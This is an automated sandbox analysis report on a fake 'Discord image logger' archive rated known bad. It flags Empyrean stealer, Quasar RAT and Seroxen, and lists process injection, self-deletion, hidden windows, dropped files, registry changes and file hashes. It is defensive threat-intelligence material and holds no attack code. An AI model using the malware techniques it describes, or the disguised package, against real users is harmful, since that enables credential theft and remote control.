Analysis Overview
SHA256
498e1a7d867df07ffa85a9f56e34faf43988b54cc84107e4696a9039fdb8c059
Threat Level: Known bad
The file discord-image-logger-release.zip was found to be: Known bad.
Malicious Activity Summary
Detects Empyrean stealer
Quasar RAT
Quasar family
Suspicious use of NtCreateUserProcessOtherParentProcess
Quasar payload
Empyrean family
Seroxen, Ser0xen
Seroxen family
Loads dropped DLL
Executes dropped EXE
Deletes itself
Checks computer location settings
Hide Artifacts: Hidden Window
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
System Location Discovery: System Language Discovery
Runs ping.exe
Uses Task Scheduler COM API
Suspicious use of UnmapMainImage
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Modifies registry class
Kills process with taskkill
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-02-24 04:13
Signatures
Detects Empyrean stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Empyrean family
Analysis: behavioral6
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
93s
Max time network
141s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20241010-en
Max time kernel
103s
Max time network
19s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2736 wrote to memory of 3008 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2736 wrote to memory of 3008 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2736 wrote to memory of 3008 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 3008 wrote to memory of 2976 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 3008 wrote to memory of 2976 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 3008 wrote to memory of 2976 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 3008 wrote to memory of 2976 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 3b8a103a8bf8810e346989e96537142a |
| SHA1 | f15ac8d08fa08e5596962bab287f9ada3dbfdb0d |
| SHA256 | d1ef060e5f85038ec3bf233b808d4f19bbd7b89004fbfe8a64e1793e6bd1c548 |
| SHA512 | d77980ef603e8818e2e81da90848f4187e9933931cb37859f1645f6c15c521e2460b5156d200ee7a098e1b454cd174918d873f2a1190f67ef8001537408d703c |
Analysis: behavioral13
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20241010-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2028 wrote to memory of 1672 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2028 wrote to memory of 1672 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2028 wrote to memory of 1672 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1672 wrote to memory of 2720 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 1672 wrote to memory of 2720 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 1672 wrote to memory of 2720 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 1672 wrote to memory of 2720 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 7e4934fe584f8af05769ea82f26c2c8d |
| SHA1 | b6c8ce236ebacbb2201f95422baefe8da7da621d |
| SHA256 | b0f39c04a8a3beadadd9b1aeb763bde1a90516196bfe0d596e9b6bda48e6d7a7 |
| SHA512 | 238883eccd6ce5ba67f0f5ad7229ec615f5d7ca8fd65f9b7c8f9cc33401fda72c4327d009f6a613f5bd1b093ba32105a9a3a79b40b25c662768db72828ade200 |
Analysis: behavioral11
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20250207-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2720 wrote to memory of 2912 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2720 wrote to memory of 2912 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2720 wrote to memory of 2912 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2912 wrote to memory of 2820 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2912 wrote to memory of 2820 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2912 wrote to memory of 2820 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2912 wrote to memory of 2820 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 5655cfbf488c9ed93c1c92c6887cad13 |
| SHA1 | c58ece13cee5553e55327b933b6b9cd1724309ad |
| SHA256 | 53b27f2aac3577c72b1cedec39c609d10f8d986d4504a29bfa93a8c4ae2cf1f5 |
| SHA512 | 20c91d105131e254e1b4719c2bcadd1cc4b224aebe3327fb11d70b0323d126ec0f95633bb3bba36886f23b3fe11b6d943b30304f0de403e9a36205b139d6ba1b |
Analysis: behavioral15
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20240903-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2704 wrote to memory of 2724 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2704 wrote to memory of 2724 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2704 wrote to memory of 2724 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2724 wrote to memory of 2612 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2724 wrote to memory of 2612 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2724 wrote to memory of 2612 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2724 wrote to memory of 2612 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 58dd7604b30aa1e947b8793b401ed49e |
| SHA1 | 7fde10807d7ded3107c2f356bbcc28b796637d5e |
| SHA256 | ba14d03360c1cd20d2fdfb82a7f1474ad293dbbd0b96f6887d9f231dc0fef1a9 |
| SHA512 | bd1833245f787985bfc9adf3b66c15f8a4752dc5409852a12e93e21a5b7b9fb29da8ccfda3b9827d6229c9f4fd10cc5f37f63e26cea0165cfa1598c9cc7db566 |
Analysis: behavioral18
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | | udp |
| GB | 104.78.173.167:80 | | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Seroxen family
Seroxen, Ser0xen
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4252 created 588 | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | C:\Windows\system32\winlogon.exe |
| PID 4128 created 588 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\system32\winlogon.exe |
| PID 4128 created 588 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\system32\winlogon.exe |
| PID 4252 created 588 | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | C:\Windows\system32\winlogon.exe |
| PID 4252 created 588 | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | C:\Windows\system32\winlogon.exe |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File created | C:\Windows\System32\vcruntime140_1d.dll | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| File created | C:\Windows\System32\vcruntime140d.dll | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| File opened for modification | C:\Windows\System32\ucrtbased.dll | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| File opened for modification | C:\Windows\System32\vcruntime140d.dll | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| File opened for modification | C:\Windows\System32\ucrtbased.dll | C:\Windows\$sxr-powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\ucrtbased.dll | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| File opened for modification | C:\Windows\System32\vcruntime140_1d.dll | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| File opened for modification | C:\Windows\System32\vcruntime140_1d.dll | C:\Windows\$sxr-powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\vcruntime140d.dll | C:\Windows\$sxr-powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4252 set thread context of 5108 | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 4128 set thread context of 2716 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe |
| PID 4128 set thread context of 3728 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe |
| PID 4252 set thread context of 212 | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 4252 set thread context of 4660 | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | C:\Windows\System32\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| File created | C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1740370487" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 24 Feb 2025 04:14:48 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={6E75927A-EA84-4F8F-95FC-2A90EA306FF6}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
